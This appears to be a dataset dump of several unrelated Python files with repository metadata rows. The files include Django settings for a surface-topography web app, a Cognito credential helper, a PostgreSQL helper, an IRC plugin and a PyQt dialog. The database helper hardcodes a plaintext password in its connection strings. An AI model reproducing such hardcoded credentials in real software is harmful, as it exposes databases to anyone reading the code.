'default': env.db('DATABASE_URL', default='postgres:///topobank'),
# 'default': env.db('DATABASE_URL', default='sqlite:///topobank.db'),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = 'config.urls'
# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'whitenoise.runserver_nostatic', # also use whitenoise with runserver
'django.contrib.staticfiles',
# 'django.contrib.humanize', # Handy template tags
'django.contrib.admin',
'django.contrib.postgres', # needed for 'search' lookup
]
THIRD_PARTY_APPS = [
'crispy_forms',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.orcid',
'rest_framework',
'fontawesomefree',
'formtools',
'bokeh',
'termsandconditions',
'storages',
'guardian',
'bootstrap_datepicker_plus', # for datepicker, see https://github.com/monim67/django-bootstrap-datepicker-plus
'django_select2',
'django_tables2',
'progressbarupload',
'celery_progress',
'notifications',
'django_filters',
'tagulous',
'trackstats',
'fullurl',
]
LOCAL_APPS = [
'topobank.users.apps.UsersAppConfig',
# Your stuff: custom apps go here
'topobank.manager.apps.ManagerAppConfig',
'topobank.analysis.apps.AnalysisAppConfig',
'topobank.usage_stats.apps.UsageStatsAppConfig',
'topobank.tabnav.apps.TabNavAppConfig',
'topobank.publication.apps.PublicationAppConfig',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {
'sites': 'topobank.contrib.sites.migrations'
}
# AUTO-CREATED PRIMARY KEYS
# ------------------------------------------------------------------------------
# New in Django 3.2.
# See: https://docs.djangoproject.com/en/3.2/releases/3.2/#customizing-type-of-auto-created-primary-keys
DEFAULT_AUTO_FIELD = 'django.db.models.AutoField'
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
'guardian.backends.ObjectPermissionBackend',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-user-model
AUTH_USER_MODEL = 'users.User'
# https://docs.djangoproject.com/en/dev/ref/settings/#login-redirect-url
LOGIN_REDIRECT_URL = 'home'
# https://docs.djangoproject.com/en/dev/ref/settings/#login-url
LOGIN_URL = 'account_login'
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
# NOTE: order matters -- terms-and-conditions redirect must run before the
# anonymous-user replacement (see inline comments below).
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware', # http://whitenoise.evans.io/en/latest/django.html#enable-whitenoise
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    # Enable the following if you want to check T&C by middleware
    # this must be called before anonymous user replacement, otherwise anonymous users will
    # always be asked to accept terms and conditons
    'termsandconditions.middleware.TermsAndConditionsRedirectMiddleware',
    'topobank.middleware.anonymous_user_middleware', # we need guardian's kind of anonymous user for API calls
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'topobank.usage_stats.middleware.count_request_middleware',
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [
    str(APPS_DIR.path('static')),
]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# STATICFILES_STORAGE = 'whitenoise.storage.ManifestStaticFilesStorage'
# test whether slow collect static comes from WhiteNoise
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(ROOT_DIR.path('media'))
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
    {
        # https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
        'DIRS': [
            str(APPS_DIR.path('templates')),
        ],
        'OPTIONS': {
            # https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
            'debug': DEBUG,
            # https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
            # https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
            'loaders': [
                'django.template.loaders.filesystem.Loader',
                'django.template.loaders.app_directories.Loader',
            ],
            # https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
                'topobank.context_processors.versions_processor',
                'topobank.context_processors.basket_processor',
                'topobank.tabnav.context_processors.fixed_tabs_processor',
            ],
        },
    },
]
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (
    str(APPS_DIR.path('fixtures')),
)
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = 'admin/'
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [
    ("""Michael Röttger""", 'roettger@tf.uni-freiburg.de'),
    ("""Lars Pastewka""", 'lars.pastewka@imtek.uni-freiburg.de')
]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# Celery
# ------------------------------------------------------------------------------
INSTALLED_APPS += ['topobank.taskapp.celery.CeleryAppConfig']
if USE_TZ:
    # http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-timezone
    CELERY_TIMEZONE = TIME_ZONE
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-broker_url
CELERY_BROKER_URL = env('CELERY_BROKER_URL', default='amqp://')
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_backend
CELERY_RESULT_BACKEND = env('CELERY_RESULT_BACKEND', default='cache+memcached://127.0.0.1:11211/') # CELERY_BROKER_URL
# we don't use rpc:// as default here, because Python 3.7 is not officially supported by celery 4.2
# and there is a problem with Python 3.7's keyword 'async' which is used in the celery code
CELERY_RESULT_PERSISTENT = True
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-accept_content
CELERY_ACCEPT_CONTENT = ['json']
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-task_serializer
CELERY_TASK_SERIALIZER = 'json'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_serializer
CELERY_RESULT_SERIALIZER = 'json'
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_SOFT_TIME_LIMIT = 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-broker_url
# CELERY_BROKER_URL = env('CELERY_BROKER_URL', default='django://')
# CELERY_BROKER_URL = 'amqp://guest:guest@localhost:5672//'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_backend
# if CELERY_BROKER_URL == 'django://':
# CELERY_RESULT_BACKEND = 'redis://'
# else:
# CELERY_RESULT_BACKEND = CELERY_BROKER_URL
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-accept_content
# CELERY_ACCEPT_CONTENT = ['json', 'pickle']
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-task_serializer
# CELERY_TASK_SERIALIZER = 'pickle'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_serializer
# CELERY_RESULT_SERIALIZER = 'pickle' # because of arrays
# django-allauth
# ------------------------------------------------------------------------------
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
# https://django-allauth.readthedocs.io/en/latest/advanced.html?highlight=name#custom-user-models
ACCOUNT_EMAIL_REQUIRED = False
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_USERNAME_REQUIRED = False
# we keep the username field for now, because it is used in the "users" app
# ACCOUNT_USER_MODEL_USERNAME_FIELD = None
ACCOUNT_FORMS = {'signup': 'topobank.users.forms.SignupFormWithName'}
# https://django-allauth.readthedocs.io/en/latest/configuration.html
# ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_EMAIL_VERIFICATION = 'none'
# https://django-allauth.readthedocs.io/en/latest/configuration.html
ACCOUNT_ADAPTER = 'topobank.users.adapters.AccountAdapter'
# https://django-allauth.readthedocs.io/en/latest/configuration.html
SOCIALACCOUNT_ADAPTER = 'topobank.users.adapters.SocialAccountAdapter'
ACCOUNT_LOGOUT_ON_GET = True # True: disable intermediate page
# Your stuff...
# ------------------------------------------------------------------------------
#
# Local references for "select2"
#
# An alternative is maybe "django-bower" which could be used
# to resolve all external javascript dependencies and install them
# locally in a defined way
SELECT2_JS = '/static/tagulous/lib/select2-4/js/select2.min.js'
SELECT2_CSS = '/static/tagulous/lib/select2-4/css/select2.min.css'
SELECT2_I18N_PATH = '/static/tagulous/lib/select2-4/js/i18n'
# The default for all these are pointers to Cloudflare CDN
#
# Define permissions when using the rest framework
#
# Make sure that no one can retrieve data from other users, e.g. in view. See GH 168.
# This may help: https://www.django-rest-framework.org/api-guide/permissions/
# This seems to fit well: https://www.django-rest-framework.org/tutorial/4-authentication-and-permissions/
#
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': (
        'rest_framework.permissions.IsAuthenticated',
    ),
    # 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
    #'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
    #'PAGE_SIZE': 2,
}
# Version number used in the GUI
TOPOBANK_VERSION = topobank.__version__
#
# Settings for authentication with ORCID
#
SOCIALACCOUNT_PROVIDERS = {
    'orcid': {
        # Base domain of the API. Default value: 'orcid.org', for the production API
        # 'BASE_DOMAIN':'sandbox.orcid.org', # for the sandbox API
        # Member API or Public API? Default: False (for the public API)
        # 'MEMBER_API': False, # for the member API
    }
}
SOCIALACCOUNT_QUERY_EMAIL = True # e-mail should be acquired from social account provider
def ACCOUNT_USER_DISPLAY(user):
    """allauth display callable: show the user's full name, not the username."""
    return user.name
#
# Settings for handling terms and conditions
#
TERMS_EXCLUDE_URL_LIST = {'/accounts/logout/'}
# TERMS_EXCLUDE_URL_PREFIX_LIST = {'/users/'}
TERMS_EXCLUDE_USERS_WITH_PERM = 'users.can_skip_terms'
TERMS_STORE_IP_ADDRESS = False
#
# Storage Settings
#
USE_S3_STORAGE = env.bool('USE_S3_STORAGE', default=False)
if USE_S3_STORAGE:
    # Enable this storage for the S3 backend
    DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
    # DEFAULT_FILE_STORAGE = 'topobank.manager.storage_backends.MediaStorage'
    AWS_LOCATION = env.str('AWS_MEDIA_PREFIX', default='media')
    # NOTE: the two AWS credentials below have no default, so enabling
    # USE_S3_STORAGE without setting them raises at import time.
    AWS_ACCESS_KEY_ID = env.str('AWS_ACCESS_KEY_ID')
    AWS_SECRET_ACCESS_KEY = env.str('AWS_SECRET_ACCESS_KEY')
    AWS_STORAGE_BUCKET_NAME = env.str('AWS_STORAGE_BUCKET_NAME', default='topobank-assets')
    AWS_AUTO_CREATE_BUCKET = True
    AWS_S3_ENDPOINT_URL = env.str('AWS_S3_ENDPOINT_URL', default='https://localhost:8082/')
    AWS_S3_USE_SSL = env.bool('AWS_S3_USE_SSL', default=True)
    AWS_S3_VERIFY = env.bool('AWS_S3_VERIFY', default=True)
    AWS_DEFAULT_ACL = None
    # Append extra characters if new files have the same name
    AWS_S3_FILE_OVERWRITE = False
#
# Settings for django-guardian
#
GUARDIAN_MONKEY_PATCH = False
GUARDIAN_RENDER_403 = True
# uses template "403.html" by default
# see https://django-guardian.readthedocs.io/en/stable/configuration.html#guardian-render-403
#
# Settings for django-tables2
#
DJANGO_TABLES2_TEMPLATE = 'django_tables2/bootstrap4.html'
#
# Setting for progress bar during upload
#
# see https://github.com/ouhouhsami/django-progressbarupload
#
FILE_UPLOAD_HANDLERS = (
    "progressbarupload.uploadhandler.ProgressBarUploadHandler",
    "django.core.files.uploadhandler.MemoryFileUploadHandler",
    "django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
PROGRESSBARUPLOAD_INCLUDE_JQUERY = False
#
# Settings for tracking package versions for analyses
#
# list of tuples of form (import_name, expression_returning_version_string)
TRACKED_DEPENDENCIES = [
    ('SurfaceTopography', 'SurfaceTopography.__version__'),
    ('ContactMechanics', 'ContactMechanics.__version__'),
    ('NuMPI', 'NuMPI.__version__'),
    ('muFFT', 'muFFT.version.description()'),
    ('topobank', 'topobank.__version__'),
    ('numpy', 'numpy.__version__'),
    ('scipy', 'scipy.__version__'),
]
#
# Settings for notifications package
#
DJANGO_NOTIFICATIONS_CONFIG = {'USE_JSONFIELD': True}
# I would like to pass the target url to a notification
#
# Settings for django-tagulous (tagging)
#
SERIALIZATION_MODULES = {
    'xml': 'tagulous.serializers.xml_serializer',
    'json': 'tagulous.serializers.json',
    'python': 'tagulous.serializers.python',
    'yaml': 'tagulous.serializers.pyyaml',
}
#
# E-Mail address to contact us
#
CONTACT_EMAIL_ADDRESS = "support@contact.engineering"
#
# Publication settings
#
MIN_SECONDS_BETWEEN_SAME_SURFACE_PUBLICATIONS = 600 # set to None to disable check
CC_LICENSE_INFOS = { # each element refers to two links: (description URL, full license text URL)
    'cc0-1.0': {
        'description_url': 'https://creativecommons.org/publicdomain/zero/1.0/',
        'legal_code_url': 'https://creativecommons.org/publicdomain/zero/1.0/legalcode',
        'title': 'CC0 1.0 Universal',
        'option_name': 'CC0 1.0 (Public Domain Dedication)'
    },
    'ccby-4.0': {
        'description_url': 'https://creativecommons.org/licenses/by/4.0/',
        'legal_code_url': 'https://creativecommons.org/licenses/by/4.0/legalcode',
        'title': 'Creative Commons Attribution 4.0 International Public License',
        'option_name': 'CC BY 4.0'
    },
    'ccbysa-4.0': {
        'description_url': 'https://creativecommons.org/licenses/by-sa/4.0/',
        'legal_code_url': 'https://creativecommons.org/licenses/by-sa/4.0/legalcode',
        'title': 'Creative Commons Attribution-ShareAlike 4.0 International Public License',
        'option_name': 'CC BY-SA 4.0'
    }
}
#
# Settings for exporting plots as thumbnails
#
# NOTE: env.path() without a default raises if the variable is unset.
FIREFOX_BINARY_PATH = env.path('FIREFOX_BINARY_PATH')
GECKODRIVER_PATH = env.path('GECKODRIVER_PATH')
#
# Analysis-specific settings
#
CONTACT_MECHANICS_KWARGS_LIMITS = {
    'nsteps': dict(min=1, max=50),
    'maxiter': dict(min=1, max=1000),
    'pressures': dict(maxlen=50),
}
| 39.837524 | 119 | 0.686735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15,880 | 0.770986 |
eaba0c23a6f87059f715260269d709b8ed977523 | 166 | py | Python | teste_app/search.py | rafaelang/teste_app | b4e95c9fd373f21ffb39131face077b0499a723d | [
"Apache-2.0"
] | null | null | null | teste_app/search.py | rafaelang/teste_app | b4e95c9fd373f21ffb39131face077b0499a723d | [
"Apache-2.0"
] | null | null | null | teste_app/search.py | rafaelang/teste_app | b4e95c9fd373f21ffb39131face077b0499a723d | [
"Apache-2.0"
] | null | null | null | import requests
from teste_app import settigns
def google(q: str):
"""Faz uma pesquisa no google"""
return requests.get(settigns.GOOGLE, params={"q": q})
| 16.6 | 57 | 0.692771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.210843 |
eaba24664d5648befbdd4f847264b9c983245bec | 1,275 | py | Python | src/data/prepare_train_data.py | ds-praveenkumar/m5-accuracy-prediction | 20255adc95c3e0fe6c6acec9fd16ac88c6e95908 | [
"MIT"
] | null | null | null | src/data/prepare_train_data.py | ds-praveenkumar/m5-accuracy-prediction | 20255adc95c3e0fe6c6acec9fd16ac88c6e95908 | [
"MIT"
] | null | null | null | src/data/prepare_train_data.py | ds-praveenkumar/m5-accuracy-prediction | 20255adc95c3e0fe6c6acec9fd16ac88c6e95908 | [
"MIT"
] | null | null | null | # github link: https://github.com/ds-praveenkumar/kaggle
# Author: ds-praveenkumar
# file: forcasting/prepare_train_data.py/
# Created by ds-praveenkumar at 13-06-2020 15 34
# feature:
import os
import pandas as pd
import numpy as np
import click
from src.utility.timeit import timeit
# Project-relative data directories.
# NOTE(review): root is derived from the *current working directory*, so these
# paths are only correct when the script is run from a direct subdirectory of
# the project root -- confirm against how the script is invoked.
root = os.path.dirname(os.getcwd())
train_data_path = os.path.join(root, 'data', 'training')
preprocess_data_path = os.path.join(root, 'data', 'preprocess')
@timeit
def prepare_train_data(prep_path, train_path, end_date='2016-06-19', window=365):
    """Split the preprocessed sales matrix into one training CSV per item.

    Loads ``sales_mat.npy`` from *prep_path*, attaches a daily date column
    ``ds`` ending at *end_date*, and writes the last *window* days of each
    item series to ``<train_path>/<column>.csv`` with columns ``ds`` and
    ``y`` (Prophet-style naming).

    Args:
        prep_path: directory containing ``sales_mat.npy``.
        train_path: output directory for the per-item CSV files.
        end_date: last calendar day of the series (default matches the
            previous hard-coded value).
        window: number of trailing days to keep per item (default 365,
            as before).
    """
    sales = np.load(os.path.join(prep_path, 'sales_mat.npy'))
    prep_df = pd.DataFrame(sales).T
    # One calendar day per row; derive the period count from the matrix
    # instead of the previous hard-coded 1913 so other sizes also work.
    prep_df['ds'] = pd.date_range(end=end_date, periods=len(prep_df)).values
    # Every column except the date column is an item series.  This replaces
    # the hard-coded ``iloc[:, :30489]`` slice, which silently dropped any
    # item columns beyond index 30488.
    item_columns = [c for c in prep_df.columns if c != 'ds']
    for column in item_columns:
        # rename() without inplace avoids mutating a slice of prep_df.
        train_items = prep_df[['ds', column]][-window:].rename(columns={column: 'y'})
        save_at = os.path.join(train_path, f"{column}.csv")
        train_items.to_csv(save_at, index=False)
        print(f"file saved at {save_at}")
@click.argument('preprocess_data_path', type=click.Path(exists=True))
@click.argument('train_data_path', type=click.Path())
def main(preprocess_data_path, train_data_path):
prepare_train_data(preprocess_data_path, train_data_path)
if __name__=='__main__':
main() | 30.357143 | 77 | 0.723137 | 0 | 0 | 0 | 0 | 786 | 0.616471 | 0 | 0 | 342 | 0.268235 |
eabbba5703420267113fe4624cc55ee6b004fe83 | 2,338 | py | Python | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import boto3
import json
def get_auth_creds(secret_details, cipid):
    """Log in to a Cognito user pool and return temporary AWS credentials.

    Args:
        secret_details: dict with 'region', 'policyname', 'clientId',
            'username', 'password' and 'userpool' entries.
        cipid: Cognito identity pool id.

    Returns:
        dict with 'region', 'policyname', 'AccessKeyId', 'SecretKey',
        'SessionToken' and 'identityID'.
    """
    region = secret_details['region']
    identity_client = boto3.client(
        'cognito-identity',
        region_name=region)
    user_pool_client = boto3.client(
        'cognito-idp',
        region_name=region)

    # Username/password login against the user pool.
    auth_result = user_pool_client.initiate_auth(
        ClientId=secret_details['clientId'],
        AuthFlow='USER_PASSWORD_AUTH',
        AuthParameters={
            'USERNAME': secret_details['username'],
            'PASSWORD': secret_details['password']})['AuthenticationResult']
    id_token = auth_result['IdToken']

    provider_name = 'cognito-idp.' + \
        region + '.amazonaws.com/' + secret_details['userpool']

    # Resolve the user's unique identity ID in the identity pool, then
    # exchange the id token for temporary AWS credentials.
    identity_id = identity_client.get_id(
        IdentityPoolId=cipid, Logins={provider_name: id_token})["IdentityId"]
    temp_creds = identity_client.get_credentials_for_identity(
        IdentityId=identity_id, Logins={provider_name: id_token})["Credentials"]

    return {
        'region': region,
        'policyname': secret_details['policyname'],
        'AccessKeyId': temp_creds["AccessKeyId"],
        'SecretKey': temp_creds["SecretKey"],
        'SessionToken': temp_creds["SessionToken"],
        'identityID': identity_id,
    }
eabbe6584c7141a2b6f0410b24806f7f69f8db70 | 1,041 | py | Python | python/db_conn.py | oerpli/MONitERO | 64f1cc613a8c287a860ab98900f8dec19d506222 | [
"MIT"
] | 2 | 2019-02-09T17:45:48.000Z | 2021-11-09T06:14:23.000Z | python/db_conn.py | oerpli/MONitERO | 64f1cc613a8c287a860ab98900f8dec19d506222 | [
"MIT"
] | null | null | null | python/db_conn.py | oerpli/MONitERO | 64f1cc613a8c287a860ab98900f8dec19d506222 | [
"MIT"
] | 1 | 2018-12-17T20:08:49.000Z | 2018-12-17T20:08:49.000Z | import psycopg2
import psycopg2.extras
import sys
from sqlalchemy import create_engine
import pandas as pd
def get_cursor():
conn_string = "host='localhost' dbname='HintereggerA' user='HintereggerA' password='root'"
# print the connection string we will use to connect
print("Connecting to database: {}".format(conn_string), file=sys.stderr)
# get a connection, if a connect cannot be made an exception will be raised here
conn = psycopg2.connect(conn_string)
# conn.cursor will return a cursor object, you can use this cursor to perform queries
cursor = conn.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)
# cursor = conn.cursor()
return cursor
def query(query_string):
    """Execute *query_string* on the module-level cursor and return all rows.

    NOTE(review): the string is executed verbatim -- never pass
    unsanitized user input here (SQL injection risk).
    """
    cursor.execute(query_string)
    return cursor.fetchall()
engine = create_engine('postgresql://HintereggerA:root@localhost/HintereggerA')
def pandaquery(query_string):
    """Run *query_string* through the SQLAlchemy engine, returning a DataFrame."""
    print("SQL: " + query_string)
    frame = pd.read_sql_query(query_string, engine)
    return frame
# Connects to the database at import time and exposes a shared module cursor.
cursor = get_cursor()
# print("DB Cursor is available as cursor")
# print("query with query(str)")
eabc2d16f749bf7011211b6d1f5405973cd4be21 | 243 | py | Python | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | 1 | 2019-06-27T08:45:23.000Z | 2019-06-27T08:45:23.000Z | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | null | null | null | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | null | null | null | arguments = ["self", "info", "args"]
helpstring = "lurk"
minlevel = 3
def main(connection, info, args) :
"""Deops and voices the sender"""
connection.rawsend("MODE %s -o+v %s %s\n" % (info["channel"], info["sender"], info["sender"]))
| 30.375 | 98 | 0.617284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 104 | 0.427984 |
eabe1302de2ccdf32bfec8af5697d4396c658e09 | 6,982 | py | Python | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | null | null | null | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | 1 | 2018-11-06T09:30:23.000Z | 2018-11-06T09:30:23.000Z | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | 1 | 2019-01-23T14:46:11.000Z | 2019-01-23T14:46:11.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'volume_layout.ui'
#
# Created: Tue Mar 26 12:40:36 2013
# by: PyQt4 UI code generator 4.7.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_Dialog(object):
    def setupUi(self, Dialog):
        """Build the static widget tree for the volume editor dialog.

        Auto-generated by pyuic4 from volume_layout.ui -- prefer editing the
        .ui file and regenerating over changing this method by hand.
        Layout: one voice per grid row (rows 2-6), each with a label
        (col 1), a volume slider (col 2) and a mute checkbox (col 3);
        a mute-all checkbox sits in row 0.
        """
        Dialog.setObjectName("Dialog")
        Dialog.resize(522, 285)
        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName("gridLayout")
        self.volume_label_0 = QtGui.QLabel(Dialog)
        self.volume_label_0.setObjectName("volume_label_0")
        self.gridLayout.addWidget(self.volume_label_0, 2, 1, 1, 1)
        self.volume_label_1 = QtGui.QLabel(Dialog)
        self.volume_label_1.setObjectName("volume_label_1")
        self.gridLayout.addWidget(self.volume_label_1, 3, 1, 1, 1)
        # Sliders use a 1..1000 range; initial values come from the .ui file.
        self.volume_settings_1 = QtGui.QSlider(Dialog)
        self.volume_settings_1.setMinimum(1)
        self.volume_settings_1.setMaximum(1000)
        self.volume_settings_1.setProperty("value", 802)
        self.volume_settings_1.setSliderPosition(802)
        self.volume_settings_1.setOrientation(QtCore.Qt.Horizontal)
        self.volume_settings_1.setObjectName("volume_settings_1")
        self.gridLayout.addWidget(self.volume_settings_1, 3, 2, 1, 1)
        self.volume_label_2 = QtGui.QLabel(Dialog)
        self.volume_label_2.setObjectName("volume_label_2")
        self.gridLayout.addWidget(self.volume_label_2, 4, 1, 1, 1)
        self.volume_settings_2 = QtGui.QSlider(Dialog)
        self.volume_settings_2.setMinimum(1)
        self.volume_settings_2.setMaximum(1000)
        self.volume_settings_2.setProperty("value", 1000)
        self.volume_settings_2.setOrientation(QtCore.Qt.Horizontal)
        self.volume_settings_2.setObjectName("volume_settings_2")
        self.gridLayout.addWidget(self.volume_settings_2, 4, 2, 1, 1)
        self.volume_label_3 = QtGui.QLabel(Dialog)
        self.volume_label_3.setObjectName("volume_label_3")
        self.gridLayout.addWidget(self.volume_label_3, 5, 1, 1, 1)
        self.volume_settings_3 = QtGui.QSlider(Dialog)
        self.volume_settings_3.setMinimum(1)
        self.volume_settings_3.setMaximum(1000)
        self.volume_settings_3.setProperty("value", 800)
        self.volume_settings_3.setOrientation(QtCore.Qt.Horizontal)
        self.volume_settings_3.setObjectName("volume_settings_3")
        self.gridLayout.addWidget(self.volume_settings_3, 5, 2, 1, 1)
        self.volume_label_4 = QtGui.QLabel(Dialog)
        self.volume_label_4.setObjectName("volume_label_4")
        self.gridLayout.addWidget(self.volume_label_4, 6, 1, 1, 1)
        self.volume_settings_4 = QtGui.QSlider(Dialog)
        self.volume_settings_4.setMinimum(1)
        self.volume_settings_4.setMaximum(1000)
        self.volume_settings_4.setPageStep(12)
        self.volume_settings_4.setProperty("value", 700)
        self.volume_settings_4.setOrientation(QtCore.Qt.Horizontal)
        self.volume_settings_4.setObjectName("volume_settings_4")
